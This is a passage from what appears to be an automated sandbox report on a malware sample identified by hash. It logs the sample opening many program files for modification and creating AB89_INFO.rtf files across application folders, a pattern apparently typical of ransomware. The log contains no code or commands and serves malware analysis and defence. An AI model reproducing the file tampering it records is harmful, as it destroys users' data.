Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\index.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\kinit.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fakaofo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator_3.3.300.v20140518-1928.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.bat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-utilities.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vilnius 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Godthab 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Genko_2.jtp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Tell_City 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Niue 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\policytool.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\jaccess.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtau 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rio_Branco 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port-au-Prince 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\derby_common.bat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Urumqi 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Brunei 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Ojinaga 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-7 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiItalic.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Istanbul 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Bissau 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Palau 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\hi.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Knox 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\icudtl.dat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Damascus 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guatemala 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Halifax 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Seoul 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Hobart 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rankin_Inlet 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\.eclipseproduct 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Cordoba 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_de.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\WET 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Martinique 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\MSBuild\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\La_Paz 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Bissau 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200616092700.pma 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Accra 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Godthab 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Lisbon 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\SubmitOptimize.wav 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\SplitBlock.jfif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fakaofo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Oral 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tunis 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Irkutsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Uzhgorod 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guayaquil 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll.sig 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\view.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.RSA 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Grand_Turk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Juan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\README.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Antigua 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Madeira 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Moncton 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\tr.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\El_Salvador 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-5 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9YDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\zh-TW.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mexico_City 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yakutat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Extensions\external_extensions.json 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT 